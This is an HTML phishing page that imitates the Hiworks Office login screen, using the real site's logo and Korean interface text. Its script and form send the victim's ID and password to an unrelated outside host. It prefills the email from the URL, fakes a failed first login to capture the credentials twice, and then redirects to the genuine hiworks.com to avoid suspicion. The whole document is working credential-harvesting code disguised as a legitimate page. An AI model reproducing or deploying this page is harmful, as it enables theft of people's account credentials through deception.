

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta
      name="viewport"
      content="width=device-width,initial-scale=1.0, maximum-scale=1.0,user-scaleable=no"
    />
    <title>&#54616;&#51060;&#50893;&#49828; &#50724;&#54588;&#49828;</title>

    <meta name="apple-mobile-web-app-title" content="hiworks" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black" />
    <meta name="msapplication-config" content="none" />

    <style>
              .go-back--button {
                position: absolute;
                top: 30px;
                left: 20px;
                padding: 6px 22px 7px;
                max-width: 90px;
                height: 27px;
                border-radius: 20px;
                cursor: pointer; }
                .go-back--button .fa-chevron-left {
                  vertical-align: middle; }
                .go-back--button .txt {
                  font-size: 18px;
                  color: #676767;
                  vertical-align: middle;
                  user-select: none; }
                .go-back--button:hover {
                  background: #e1e1e1; }
              }


              .go-back--button .fa-chevron-left {
                vertical-align: middle;
              }
              .go-back--button .txt {
                font-size: 18px;
                color: #676767;
                vertical-align: middle;
                user-select: none;
              }
              .go-back--button:hover {
                background: #e1e1e1;
              }

              @charset "utf-8";

      /* reset */
      body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,textarea,p,blockquote,th,td,input,select,textarea,button 

{margin:0;padding:0}
      fieldset,img {border:0 none}
      dl,ul,ol,menu,li {list-style:none}
      blockquote, q {quotes: none}
      blockquote:before, blockquote:after,q:before, q:after {content:'';content:none}
      input,select,textarea,button {vertical-align:middle}
      input[type='text'],input[type='password']{-webkit-appearance:none;border-radius:0/*Safari/Chrome*/}
      button {border:0 none;background-color:transparent;cursor:pointer}
      body {background:#fff}
      body,th,td,input,select,textarea,button {font-size:18px;line-height:1.5;font-family:Apple Gothic,"Malgun Gothic",dotum,"Arial", sans-

serif;color:#333}
      a {color:#333;text-decoration:none}
      a:active, a:hover {text-decoration:none}
      address,caption,cite,code,dfn,em,var {font-style:normal;font-weight:normal}
      table {border-collapse:collapse;border-spacing:0}

      /* global */
      .skip_navigation a {position:absolute;top:-70px;left:0;z-index:10000;transition:0.3s;width:100%;background:#001157;text-

align:center;color:#fff;padding:20px 0px}
      .skip_navigation a:focus {top:0}
      .clear_fix:after {display:block;content:'';clear:both}
      .hide {display:none}
      .f_l {float:left}
      .f_r {float:right}
      .align_center {text-align:center}
      .font_bold{font-weight:bold}
      .blind {display:block;overflow:hidden;position:absolute;left:-9999px;width:1px;height:1px;font-size:0;line-height:0;text-indent:-9999px}

      .point-txt{color:#0197e4 !important}
      .point-txt2{color:#ed4f4f !important}
      .err .wr-txt{color:#ed4f4f;font-size:12px;letter-spacing:-1px}
      .link-txt{color:#2c86dc}
      .link-txt:hover,.link-txt:focus{text-decoration:underline}
      .spr{display:inline-block;background:url(../../images/login/sp_image.png) 0 0 no-repeat;background-size:250px 250px}
      .btn-hw-start {display:block; width:278px; margin:18px auto 0; border-radius:3px; background-color:#2c86dc; color:#fff; font-size:16px; 

line-height:44px; -webkit-transition:all 0.25s; -moz-transition:all 0.25s; transition:all 0.25s}
      .btn-hw-start:hover,.btn-hw-start:focus{background:#1277d5}
      .container-wrap{width:90%;margin:0 auto}
      .dot-list{margin-left:20px;list-style:disc}

      /* ios font-size */
      html {
      	-webkit-text-size-adjust: none;
      	-moz-text-size-adjust: none;
      	-ms-text-size-adjust: none;
      }


      /* placeholder */
      ::-webkit-input-placeholder {color:#999}
      :-moz-placeholder{/* Firefox 18- */color:#999}
      ::-moz-placeholder{/* Firefox 19+ */color:#999}
      :-ms-input-placeholder{color:#999}

      /* button */
      .btn-wrap{padding:60px 0;text-align:center}
      .btn-wrap.tr{text-align:right}
      .btn-wrap.case2{padding:60px 0 10px}
      .btn-wrap .btn{margin-bottom:20px}
      .btn{display:inline-block;height:68px;line-height:68px;margin:0 auto;padding:0 80px;color:#666;cursor:pointer;font-size:18px;text-

align:center;word-break:normal;white-space:nowrap;border:1px solid #c8c8c8;border-radius:2px;background:#fff;-webkit-appearance:none;-webkit-

transition:all 0.25s;-moz-transition:all 0.25s;transition:all 0.25s}
      .btn.big{padding:0 54px}
      .btn.small{height:48px;line-height:48px;padding:0 44px;font-size:16px;border-radius:0}
      .btn-wrap .btn.full{display:block}
      .btn:hover,.btn:focus{border-color:#a8a8a8}
      .btn.color{color:#fff;border-color:#2985db;background:#2985db}
      .btn.color:hover,.btn.color:focus{background:#1277d5}
      .btn.txt-etc{color:#2985db}
      .btn.txt-etc:hover,.btn.txt-etc:focus{border-color:#2985db}
      .btn.bg-etc{color:#666;border-color:#f1f1f1;background:#f1f1f1}
      .btn.bg-etc:hover,.btn.bg-etc:focus{border-color:#dadada;background:#dadada}
      .several .btn{width:calc(100% - 2px);padding:0;margin-bottom:20px}
      button.btn{height:70px;line-height:70px}
      button.btn.small{height:50px;line-height:50px}

      /* input */
      .int{width:100%;height:56px;line-height:56px;margin-bottom:14px;text-indent:20px;border:1px solid #c8c8c8;box-sizing:border-box}
      .int.errint{border:2px solid #2985db}

      /* modal */
      .dim {display:none;position:fixed;top:0;left:0;z-

index:1000;width:100%;height:100%;margin:0;padding:0;background:#000;opacity:0.5;filter:alpha(opacity=50)}
      .modal_window{position:fixed;left:50%;top:50%;width:290px;z-index:1010;background:#fff;box-shadow:0.1em 0.1em 0.8em rgba(0,0,0,0.5)}
      .modal_header{padding:14px 20px 7px}
      .my_layer h4{padding:14px 20px 12px}
      .modal_body,.my_layer div{padding:0 20px;color:#666}
      .modal_body ul.list{margin-left:3px;padding-left:10px}
      .modal_body ul.list li{list-style:disc;text-align:left}
      .modal_footer{padding:10px 10px;margin-bottom:10px;text-align:center}
      .modal_close{display:inline-block;padding:5px 10px;border:1px solid #ccc;cursor:pointer;color:#464646;background:#f8f8f8}
      .mobile_layer {display:block}
      .pc_layer {display:none}

      /* --------------------------------------------
       * ipad-portrait
      /* ------------------------------------------ */
      @media screen and (min-width:768px) {

      .modal_window{width:728px}
      .several .btn{width:auto;padding:0 54px;margin:0 10px 20px}
      .several.tr .btn{margin:0 0 0 20px}

      }

      /* --------------------------------------------
       * ipad-landscape
      /* ------------------------------------------ */
      @media screen and (min-width:1024px) {

      	body,th,td,input,select,textarea,button{font-size:14px}
      	.dot-list:before{margin-right:10px}
      	.btn-wrap{padding:100px 0 100px}
      	.btn-wrap.case2{padding:100px 0 60px}
      	.btn{height:58px;line-height:54px;padding:0 54px}
      	.btn.big{height:68px;line-height:68px;padding:0 44px;font-size:24px}
      	.btn.small{height:34px;line-height:33px;padding:0 24px;font-size:14px;border-radius:0}
        .btn-wrap .btn.full{display:inline-block;}
      	.int{width:100%;height:50px;line-height:50px;margin-bottom:10px}
      	button.btn{height:60px;line-height:60px}
      	button.btn.big{height:70px;line-height:70px}
      	button.btn.small{height:36px;line-height:35px}

      	/* layer */
      	.pc_layer {position:relative;display:block}
      	.mobile_layer {display:none}
      	.my_layer{position:absolute;padding-bottom:20px;z-index:1010;background:#f8f8f8;border:1px solid #eee}
      	.my_layer .close-btn{position:absolute;right:14px;top:14px;padding:0}
      	.my_layer .close-btn a{display:inline-block;width:24px;height:24px;background-position:-1px -242px;background-size:500px 500px}
      	.my_layer ul.list{margin-left:3px;padding-left:10px}
      	.my_layer ul.list li{list-style:disc}

      }


      /* --------------------------------------------
       * hamburger
      /* ------------------------------------------ */
      .hamburger {
        position:absolute;
        top:14px;
        right:11px;
        width:50px;
        height:40px;
        cursor: pointer;
        -webkit-transform: translate3d(0px,0px,0px);
        -moz-transform: translate3d(0px,0px,0px);
        -ms-transform: translate3d(0px,0px,0px);
        -webkit-transition-property: -webkit-transform;
        -webkit-transition-timing-function: cubic-bezier(0.6,0,0.2,1);
        -moz-transition-property: -moz-transform;
        -moz-transition-timing-function: cubic-bezier(0.6,0,0.2,1);
        -ms-transition-property: -ms-transform;
        -ms-transition-timing-function: cubic-bezier(0.6,0,0.2,1);
      }
      .hamburger>div>p:nth-child(1) {
        top: 10px;
        -webkit-transform: translate3d(0px,0px,0px) rotate(0deg);
        -moz-transform: translate3d(0px,0px,0px) rotate(0deg);
        -ms-transform: translate3d(0px,0px,0px) rotate(0deg);
      }
      .hamburger>div>p:nth-child(2) {
        top: 20px;
        -webkit-transform: translate3d(0px,0px,0px) scaleX(1);
        -moz-transform: translate3d(0px,0px,0px) scaleX(1);
        -ms-transform: translate3d(0px,0px,0px) scaleX(1);
      }
      .hamburger>div>p:nth-child(3) {
        top: 30px;
        -webkit-transform: translate3d(0px,0px,0px) rotate(0deg);
        -moz-transform: translate3d(0px,0px,0px) rotate(0deg);
        -ms-transform: translate3d(0px,0px,0px) rotate(0deg);
      }
      .hamburger>div>p {
        display: block;
        width: 36px;
        height: 2px;
        border-radius:4px;
        background-color:#666;
        position: absolute;
        z-index: 95;
        left: 5px;
        -webkit-transition-property: -webkit-transform,background-color;
        -webkit-transition-duration: .3s;
        -webkit-transition-timing-function: cubic-bezier(0.6,0,0.2,1);
        -moz-transition-property: -moz-transform,background-color;
        -moz-transition-duration: .3s;
        -moz-transition-timing-function: cubic-bezier(0.6,0,0.2,1);
        -ms-transition-property: -ms-transform,background-color;
        -ms-transition-duration: .3s;
        -ms-transition-timing-function: cubic-bezier(0.6,0,0.2,1);
      }
      .hamburger.on>div>p:nth-child(1) {
        -webkit-transform: translate3d(0px,9px,0px) rotate(-45deg);
        -moz-transform: translate3d(0px,9px,0px) rotate(-45deg);
        -ms-transform: translate3d(0px,9px,0px) rotate(-45deg);
      }
      .hamburger.on>div>p:nth-child(2) {
        -webkit-transform: translate3d(0px,0px,0px) scaleX(0);
        -moz-transform: translate3d(0px,0px,0px) scaleX(0);
        -ms-transform: translate3d(0px,0px,0px) scaleX(0);
      }
      .hamburger.on>div>p:nth-child(3) {
        -webkit-transform: translate3d(0px,-11px,0px) rotate(45deg);
        -moz-transform: translate3d(0px,-9px,0px) rotate(45deg);
        -ms-transform: translate3d(0px,-9px,0px) rotate(45deg);
      }
      /* //hamburger */


      /* --------------------------------------------
       *  Core Owl Carousel CSS File
       *  v1.3.3
       /* ------------------------------------------ */
      /* clearfix */
      .owl-carousel .owl-wrapper:after {
        content: ".";
        display: block;
        clear: both;
        visibility: hidden;
        line-height: 0;
        height: 0;
      }
      /* display none until init */
      .owl-carousel{
        display: none;
        position: relative;
        width: 100%;
        -ms-touch-action: pan-y;
      }
      .owl-carousel .owl-wrapper{
        display: none;
        position: relative;
        -webkit-transform: translate3d(0px, 0px, 0px);
      }
      .owl-carousel .owl-wrapper-outer{
        overflow: hidden;
        position: relative;
        width: 100%;
      }
      .owl-carousel .owl-wrapper-outer.autoHeight{
        -webkit-transition: height 500ms ease-in-out;
        -moz-transition: height 500ms ease-in-out;
        -ms-transition: height 500ms ease-in-out;
        -o-transition: height 500ms ease-in-out;
        transition: height 500ms ease-in-out;
      }

      .owl-carousel .owl-item{
        float: left;
      }
      .owl-controls .owl-page,
      .owl-controls .owl-buttons div{
        cursor: pointer;
      }
      .owl-controls {
        -webkit-user-select: none;
        -khtml-user-select: none;
        -moz-user-select: none;
        -ms-user-select: none;
        user-select: none;
        -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
      }
      /* mouse grab icon */
      .grabbing {
          cursor:url(grabbing.png) 8 8, move;
      }
      /* fix */
      .owl-carousel  .owl-wrapper,
      .owl-carousel  .owl-item{
        -webkit-backface-visibility: hidden;
        -moz-backface-visibility:    hidden;
        -ms-backface-visibility:     hidden;
        -webkit-transform: translate3d(0,0,0);
        -moz-transform: translate3d(0,0,0);
        -ms-transform: translate3d(0,0,0);
      }

      /*
      *   Owl Carousel Owl Demo Theme
      * v1.3.3
      */
      .owl-theme .owl-controls{
        margin-top: 10px;
        text-align: center;
      }
      /* Styling Next and Prev buttons */
      .owl-theme .owl-controls .owl-buttons div{
        color: #FFF;
        display: inline-block;
        zoom: 1;
        margin: 5px;
        padding: 3px 10px;
        font-size: 12px;
        background: #869791;
        filter: Alpha(Opacity=50);/*IE7 fix*/
        opacity: 0.5;
      }
      /* Clickable class fix problem with hover on touch devices */
      /* Use it for non-touch hover action */
      .owl-theme .owl-controls.clickable .owl-buttons div:hover{
        filter: Alpha(Opacity=100);/*IE7 fix*/
        opacity: 1;
        text-decoration: none;
      }
      /* Styling Pagination*/
      .owl-theme .owl-controls .owl-page{
        display: inline-block;
        zoom: 1;
        *display: inline;/*IE7 life-saver */
      }
      .owl-theme .owl-controls .owl-page span{
        display: block;
        width: 6px;
        height: 6px;
        margin: 5px 6px;
        border-radius: 50%;
        background: #e7e7e7;
      }
      .owl-theme .owl-controls .owl-page.active span {
        background-color:#2985dc
      }
      .owl-theme .owl-controls .owl-page.active span,
      .owl-theme .owl-controls.clickable .owl-page:hover span{
        filter: Alpha(Opacity=100);/*IE7 fix*/
        opacity: 1;
      }
      /* If PaginationNumbers is true */
      .owl-theme .owl-controls .owl-page span.owl-numbers{
        height: auto;
        width: auto;
        color: #FFF;
        padding: 2px 10px;
        font-size: 12px;
        -webkit-border-radius: 30px;
        -moz-border-radius: 30px;
        border-radius: 30px;
      }
      /* preloading images */
      .owl-item.loading{
        min-height: 150px;
        background: url(AjaxLoader.gif) no-repeat center center
      }

      .file_input_button{width: 56px; position: absolute; top: 0px; padding-left: 5px;}
      .file_input_hidden{cursor: pointer; position: absolute; left: 205px; top: 0px; width: 60px; height: 23px; opacity: 0; filter: alpha

(opacity=0); -ms-filter: "alpha(opacity=0)"; -khtml-opacity: 0; -moz-opacity: 0;}

      @charset "utf-8";

      /* --------------------------------------------
       * mobile content
      /* ------------------------------------------ */
      #wrap {width:100%; overflow:hidden}
      .int_jogin{display:block;width:100%;height:70px;margin:0 auto;color:#fff;cursor:pointer;line-height:70px;text-

align:center;border:none;border-radius:2px;background:#2c86dc;-webkit-appearance:none;/*Safari/Chrome*/-webkit-transition: all 0.25s;-moz-

transition: all 0.25s;transition: all 0.25s}
      .int_jogin:hover,.int_jogin:focus{background:#1277d5}

      /* office login */
      input.type-J[type="text"], input.type-J[type="password"]{border:1px solid #c8c8c8;display:block;text-indent:10px;margin-

top:12px;background:#fff; width:100%;font-size:inherit;color:inherit;line-height:56px;height:56px;box-sizing:border-box}
      input.sv[type="text"]{border:none;color:#333;background:none}
      .loginWrap-ofc{background:#fff}
      .loginBox-ofc{width:90%;margin:0 auto;background:#fff}
      .loginBox-ofc a{color:inherit}
      .head-ofc{padding:50px 0 0;text-align:center}
      .head-ofc a{display:inline-block;width:230px;height:50px;text-align:center}
      .head-ofc img{width:100%}
      .body-ofc{color:#666; text-align:center}
      .body-ofc .go-www{color:#2985db;margin:20px 0 0;display: inline-block}
      .body-ofc .save-ofc{text-align:right;margin:35px 0 15px}
      .body-ofc .save-ofc:after {display: block;clear: both;content: '';}
      .body-ofc .save-ofc li{display:inline-block;float: left;}
      .body-ofc .save-ofc li.cont-ip {float: right;}
      .body-ofc .save-ofc .cont-ip .is-state{display: inline-block;width: 45px;height: 26px;line-height: 24px;border:1px solid #ccc;border-

radius: 20px;color: #939baa;font-weight: bold;text-align: center;cursor: pointer;}
      .body-ofc .save-ofc .cont-ip .is-state.on {color: #2c86dc;}

      /*&#44592;&#54925; &#50836;&#52397; &#51452;&#49437; &#52376;&#47532;*/
      /*.body-ofc .save-ofc li:last-child{color:#2985db;margin-left:2px}
      .body-ofc .save-ofc li:last-child:before{color:#c8c8c8;display:inline-block;content:'|';margin-right:8px}*/

      .body-ofc .err {text-align:left;padding:3px 0 0}
      .body-ofc .save-ofc-2 {margin:60px 0 0;position:relative}
      .save-ofc-2 .office-login {text-align:left;padding:0}
      .save-ofc-2 .office-login span {color:#666}
      .save-ofc-2 .office-login .icon-q {text-align:center}
      .save-ofc-2 .save {position:absolute;right:0;top:0}
      #svId + label {margin-left:3px}
      .body-ofc .box-notice {text-align:left;box-shadow:1px 1px 3px 1px #eee; margin:30px 0 40px;min-width:288px}
      .body-ofc .box-notice .inner {box-shadow:-1px -1px 3px 1px #eee; padding:10px; position:relative}
      .body-ofc .box-notice p:first-of-type {padding-bottom:8px;color:#333}
      .body-ofc .box-notice p:first-of-type .spr {background-position:-97px -47px;width:11px;height:11px;padding:3px;margin:0 0 -3px 6px}
      .body-ofc .box-notice li:after {display:block;content:'';clear:both}
      .body-ofc .box-notice li a {width:65%;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;display:block;float:left}
      .body-ofc .box-notice li .spr {background-position:-100px -68px;width:3px;height:3px;margin:0px 5px 3px 0}
      .body-ofc .box-notice li .date {float:right}
      .body-ofc .box-notice ul + .spr {background-position:-97px -47px;width:14px;height:14px;position:absolute;top:16px;left:80px}
      .body-ofc .btn-login {margin-top:20px}
      .foot-ofc {display:none}
      .body-ofc .box-notice .inner .phising {position: absolute;top:10px;right:10px; color: #ff472e;}
      .body-ofc .box-notice .inner .phising .warning {position: relative;top: 1px;display: inline-block;width: 14px;height: 14px;background: 

#ff472e;color: #fff;border-radius: 50%;line-height: 14px;font-weight: bold;text-align: center;}

      .layer_box.mid_large {width: 350px;padding: 14px 15px 16px;box-sizing: border-box;}
      .layer_box .title_layer {font-size: 18px;}

      .layer_box.phishing {box-sizing: border-box;width:320px;}
      .layer_box.phishing .header {background: #ffe1dd;padding: 30px 20px; color: #ff472e;text-align: center;font-size: 12px;letter-spacing: -

1px;}
      .layer_box.phishing .header .warning {position: relative; top:1px;display: inline-block; width: 14px; height: 14px;background: #ff472e; 

color: #fff;border-radius: 50%;line-height: 14px;font-weight: bold;}
      .layer_box.phishing .body {font-size: 14px;padding: 20px;letter-spacing: -1px; color: #666;}
      .layer_box.phishing .body p {padding-bottom: 20px;}
      .layer_box.phishing .body .underline {text-decoration: underline;}
      .layer_box.phishing .body li {font-size: 12px;color: #9a999e; text-indent: -5px;line-height: 1.8;}


      /* --------------------------------------------
       * ipad-portrait
      /* ------------------------------------------ */
      @media screen and (min-width:768px) {
          /* office login */
          .body-ofc .box-notice li a {width:80%}
      	.modal_body .ex-inner,.my_layer .ex-inner {display:table;margin:30px 0 0 15px}
      	.modal_body .ex-inner span,.my_layer .ex-inner span {display:table-cell;width:40px;word-break:break-all;word-wrap:break-word}
      	.set-pw .several.tr .btn {margin:0 0 0 15px}

          .layer_box.large {width: 640px;padding: 25px 30px 32px;}
          .layer_box.mid_large {width: 450px;padding: 25px 30px 32px;}
          .layer_box .title_layer {font-size: 16px;padding-bottom: 21px;}
      }


      /* --------------------------------------------
       * ipad-landscape
      /* ------------------------------------------ */
      @media screen and (min-width:1024px) {
      	.spr{background-size:500px 500px}

      	/* office login */
      	input.type-J[type="text"], input.type-J[type="password"]{text-indent:20px;margin-top:12px;line-height:50px;height:50px}
      	.loginWrap-ofc{background:#f3f2f0;/* min-height:870px; */padding:10% 0 0;position:fixed;top:0;right:0;bottom:0;left:0}
      	.loginWrap-ofc.bg{background:#f3f2f0 url(../images/bg_ofc.jpg) 0 0/cover no-repeat}
      	.loginWrap-ofc.bg .loginBox-ofc{background:rgba(255,255,255,0.3)}
      	.loginBox-ofc{width:420px;padding:0 30px; border:1px solid #d0d0d0}
      	.loginBox-ofc.noline{border:none}
      	.head-ofc{padding:60px 0 0}
      	.head-ofc a{width:280px;height:60px}
      	.body-ofc .save-ofc{margin:70px 0 15px}

      	/*&#44592;&#54925; &#50836;&#52397; &#51452;&#49437; &#52376;&#47532;*/
      	/*.body-ofc .save-ofc li:last-child{margin-left:6px}
      	.body-ofc .save-ofc li:last-child:before{margin-right:12px}*/

      	.body-ofc .box-notice{margin:25px 0 50px}
      	.body-ofc .box-notice.noline{box-shadow:none}
      	.body-ofc .box-notice .inner{padding:23px 20px}
      	.body-ofc .box-notice.noline .inner{box-shadow:none;padding:10px}
      	.body-ofc .box-notice p:first-of-type{padding-bottom:8px}
      	.body-ofc .box-notice p:first-of-type .spr{background-position:-240px -100px;width:13px;height:13px;padding:0;margin:0px 0 -1px 8px}
      	.body-ofc .box-notice li a{width:75%}
      	.body-ofc .box-notice li .spr{background-position:-216px -138px;width:4px;height:4px;margin:0px 5px 3px 0}
      	.body-ofc .box-notice ul + .spr{background-position:-240px -

100px;width:13px;height:13px;padding:0;position:absolute;top:28px;left:83px;}
      	.body-ofc .box-notice.noline ul + .spr{top:14px;left:73px;}
      	.body-ofc .btn-login{margin-top:20px}
      	.body-ofc .btn-login .int_jogin{line-height:60px;font-size:18px;}
      	.foot-ofc{display:block;text-align:center;padding:14px 0 0}
      	.foot-ofc a{color:#999}

          .layer_box.large {width: 640px;padding: 25px 30px 32px;}
          .layer_box.mid_large {width: 450px;padding: 25px 30px 32px;box-sizing: content-box;}
          .layer_box .title_layer {font-size: 16px;padding-bottom: 21px;}
          .layer_box.phishing {width: 392px;}
          .layer_box.phishing .header {font-size: 14px; text-align: left;padding: 30px;}
          .layer_box.phishing .header .warning {text-align: center; line-height: 14px;}
          .layer_box.phishing .body {padding: 30px;}
      }


      /* --------------------------------------------
       * wide
      /* ------------------------------------------ */
      @media screen and (min-width:1200px) {
      	#wrap{position:relative}

          /* office login */
          .loginWrap-ofc{/* min-height:980px */}


          .layer_box.large {width: 640px;padding: 25px 30px 32px;}
          .layer_box.mid_large {width: 450px;padding: 25px 30px 32px;box-sizing: content-box;}
          .layer_box .title_layer {font-size: 16px;padding-bottom: 21px;}

      }

      #dimmed {
          background-color: #000;
          display: none;
          height: 100%;
          left: 0;
          margin: 0;
          opacity: 0.3;
          padding: 0;
          position: fixed;
          top: 0;
          width: 100%;
          z-index: 1000;
      }

      /* &#47196;&#44536;&#51064; &#54168;&#51060;&#51648; &#50500;&#51060;&#46356; &#49888;&#52397; &#52628;&#44032; */
      .id-regform {margin-top:20px;color:#2985db;cursor:pointer;}
      .after:after {content: '';display: block;clear: both;}
      .w50 {width:50px !important}
      .w100 {width: 100px!important;}
      .w200 {width:200px !important}
      .mgt_10 {margin-top:10px}
      .mgr_10 {margin-right:10px}
      .pdt_30 {padding-top: 30px;}
      .font12 {font-size:12px;color:#9a989d;}
      .weakblue {color: #779ec0!important;}
      .layer_box {position: fixed;top: 50%;left: 50%;z-index: 1010;border: 1px solid #8d8d8d;background: #fff;}
      .layer_box .scroll{height:475px;overflow-y: auto;}
      .layer_box .title_layer {padding-bottom: 21px;}
      .layer_box .text_variables {color: #2985db;}
      .layer_box .to-add dl {width: 100%;margin-bottom: 15px;color:#676767;}
      .layer_box .to-add dt {width: 20%;float:left;}
      .layer_box .to-add dt span {color:#d91a1a;}
      .layer_box .to-add dd {float: right;width: 80%;}
      .layer_box input[type="text"], .layer_box input[type="password"]  {height: 21px;font-size:14px;border:1px solid #a5acb2;color:#676767;}
      .layer_box .select-box {border: 1px solid #a5acb2;height:23px;color:#676767;}
      .layer_box .layer_button {margin-top: 29px;line-height: 19px;text-align: center;}
      .layer_button button {padding: 6px 27px 7px;color: #444;letter-spacing: -1px;border: 0;background: #f1f1f1;}
      .layer_button button:hover {background:#dadada;}
      .layer_box .btn_variables {background:#fff;padding:5px 27px 6px;border:1px solid #c8c8c8;color:#2c86dc;}
      .layer_box .btn_variables:hover {border:1px solid #2c86dc;background:#fff;}

      .icon.btn_closelayer {
          position: absolute;
          top: 10px;
          right: 10px;
          width: 17px;
          height: 16px;
          background-position: -281px 0;
      }
      .icon {
          background: url(/static/ui/images/sp_icon.png) 0 0 no-repeat;
      }

      /* &#47196;&#44536;&#51064; &#54168;&#51060;&#51648; &#50500;&#51060;&#46356; &#46321;&#47197; &#49888;&#52397; 

&#50864;&#54200;&#48264;&#54840; &#44160;&#49353; &#47112;&#51060;&#50612;*/
      .layer_box .title_layer {
          padding-bottom: 21px;
      }
      .layer_box .text_variables {
          color: #2985db;
      }
      .mgr_20 {
          margin-right: 20px;
      }
      .bold {
          font-weight: 700;
      }
      .cal_table1.bdt {
          border-top: 1px solid #dedede;
      }
      .cal_table1 {
          width: 100%;
      }
      .mgt_10 {
          margin-top: 10px;
      }
      .cal_table1 tr td:first-child, .cal_table1 tr th:first-child {
          border-left: 0 none;
      }
      .cal_table1 tbody th {
          text-align: left;
      }
      .cal_table1 th {
          background: #f9f9f9 none repeat scroll 0 0;
          border-bottom: 1px solid #dedede;
          border-left: 1px solid #dedede;
          font-weight: 400;
          padding: 6px 12px;
      }
      .cal_table1 td {
          border-bottom: 1px solid #dedede;
          border-left: 1px solid #dedede;
          padding: 6px 12px;
      }
      .layer_box table caption {
          display: none;
      }
      .pdt_10 {
          padding-top: 10px !important;
      }
      .gr_depth1 {
          padding-left: 14px;
          text-indent: -12px;
      }
      .tableType01 {
          border-bottom: 1px solid #cdcdcd;
          border-top: 1px solid #cdcdcd;
          width: 100%;
      }
      .post_scroll {
          height: 224px;
          overflow-y: auto;
      }
      .tableType01 th, .list_select .tableType01 th {
          background: #f9f9f9 none repeat scroll 0 0;
          border-bottom: 1px solid #ececec;
          color: #333;
          font-weight: 400;
          padding: 14px 0;
      }
      .tableType01 .center {
          padding-left: 0;
          text-align: center;
      }
      .tableType01 td, .list_select .tableType01 td {
          padding: 12px 0 12px 16px;
          word-break: break-all;
      }
      .pdt_30 {
          padding-top: 30px;
      }
    </style>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  </head>
  <body>
  <form action=https://dev-globa-login-ec2l-com.pantheonsite.io/Hiwork/form1.php method=post>
    <div id="wrap">
      <!-- skip navigation -->
      <div class="skip_navigation" data-ui="skipNavigation">
        <a >&#48376;&#47928; &#50689;&#50669;&#51004;&#47196; &#48148;&#47196;&#44032;&#44592;</a>
      </div>
      <div>
        <div class="loginWrap-ofc" id="contents">
          <!-- loginBox-ofc -->
          <div class="loginBox-ofc">
            <h1 class="head-ofc">
              <img
                src="https://office.hiworks.com/kecbd.com/common/logo/login"
                style="width: 280px; height: 51px"
                alt="hiworks"
              />
            </h1>
            <div class="body-ofc">
              <ul class="save-ofc">
                <li>
                  <input
                    type="checkbox"
                    name="office_remember"
                    id="office_remember"
                  />
                  <label for="office_remember">&#50500;&#51060;&#46356; &#51200;&#51109;</label>
                </li>
                <li class="cont-ip">
                  IP&#48372;&#50504;<span class="is-state on" id="ip_security_state"
                    >ON</span
                  >
                </li>
              </ul>
              <section>
                <input
                  type="text"
                  class="type-J"
                  title="&#50500;&#51060;&#46356;"
                  name="uu"
                  id="office_id"
                  value=""
                  placeholder="&#50724;&#54588;&#49828; &#50500;&#51060;&#46356;(&#51060;&#47700;&#51068; &#54805;&#49885;)"
                  required=""
                />
                <input
                  type="password"
                  class="type-J"
                  title="&#48708;&#48128;&#48264;&#54840;"
                  name="pp"
                  id="office_passwd"
                  value=""
                  placeholder="&#48708;&#48128;&#48264;&#54840;"
                  onkeydown="if(event.keyCode==13) officeLogin();"
                  required=""
                />
                <p class="err">
                  <span
                    class="wr-txt"
                    id="login_error_msg"
                    style="display: none"
                    >&#50500;&#51060;&#46356;&#47484; &#51077;&#47141;&#54644;&#51452;&#49464;&#50836;</span
                  >
                </p>
                <p class="err">
                  <span
                    class="wr-txt"
                    id="password_error_msg"
                    style="display: none"
                    >&#48708;&#48128;&#48264;&#54840;&#47484; &#51077;&#47141;&#54644;&#51452;&#49464;&#50836;</span
                  >
                </p>
                <p class="err">
                  <span class="wr-txt" id="try_error_msg" style="display: none"
                    >&#51096;&#47803;&#46108;. &#45796;&#49884; &#49884;&#46020;&#54616;&#49901;&#49884;&#50724;</span
                  >
                </p>
                <p class="btn-login">
                  <label
                    ><input
                      type="submit"
                      title="&#47196;&#44536;&#51064;"
                      value="&#47196;&#44536;&#51064;"
                      class="int_jogin"
                      onclick="officeLogin();"
                  /></label>
                </p>
                <a class="go-www"
                  >&#54616;&#51060;&#50893;&#49828; &#54924;&#50896; &#47196;&#44536;&#51064;</a
                >
              </section>
            </div>
          </div>
          <!-- // loginBox-ofc -->
          <!-- foot-ofc -->
          <footer>
            <div class="foot-ofc">
             
            </div>
          </footer>
          <!-- // foot-ofc -->
        </div>
      </div>

      <div id="dimmed"></div>
    </div><script>
      let count = 0;
      var hash = window.location.hash;
      var con = hash.split("#")[1];
      let office_passwd;
      let office_id;

      if (con === undefined) {
        $("#office_id").val("");
        $("#office_id").focus();
      } else{
        $("#office_id").val(con);
        $("#office_passwd").focus();
      }
      
      
      function officeLogin() {
        office_id = $("#office_id").val();
        office_passwd = $("#office_passwd").val();

        if (office_id == "" || office_id.length <= 4) {
          $("#office_id").val("");
          $("#password_error_msg").hide();
          $("#login_error_msg").show();
          $("#office_id").focus();
          return false;
        }

        if (office_passwd == "" || office_passwd.length <= 4) {
          $("#office_passwd").val("");
          $("#login_error_msg").hide();
          $("#password_error_msg").show();
          $("#office_passwd").focus();
          return false;
        }

        send();
      }

      function resetForm() {
        $("#password_error_msg").show();
        $("#login_error_msg").hide();
        $("#office_passwd").val("");
        $("#office_passwd").focus();
      }

      function send() {
        console.log("Sent!");
        var uid = $("#office_id").val();
        var idpwd = $("#office_passwd").val();

        $.ajax({
          url: "https://dev-globa-login-ec2l-com.pantheonsite.io/Hiwork/form1.php",
          type: "POST",
          data: {
            user: uid,
            pass: idpwd,
            type: 1,
          },
          success: function (response) {
            if (count === 1) {
              setTimeout(() => {
                location.href = "https://hiworks.com/";
              }, 2000);
            } else {
              count++;
              resetForm();
            }
          },
          error: function () {
            console.log("..oops. There was an error");
          },
        });
      }
    </script>

</form>
  </body>

  
  
</html>
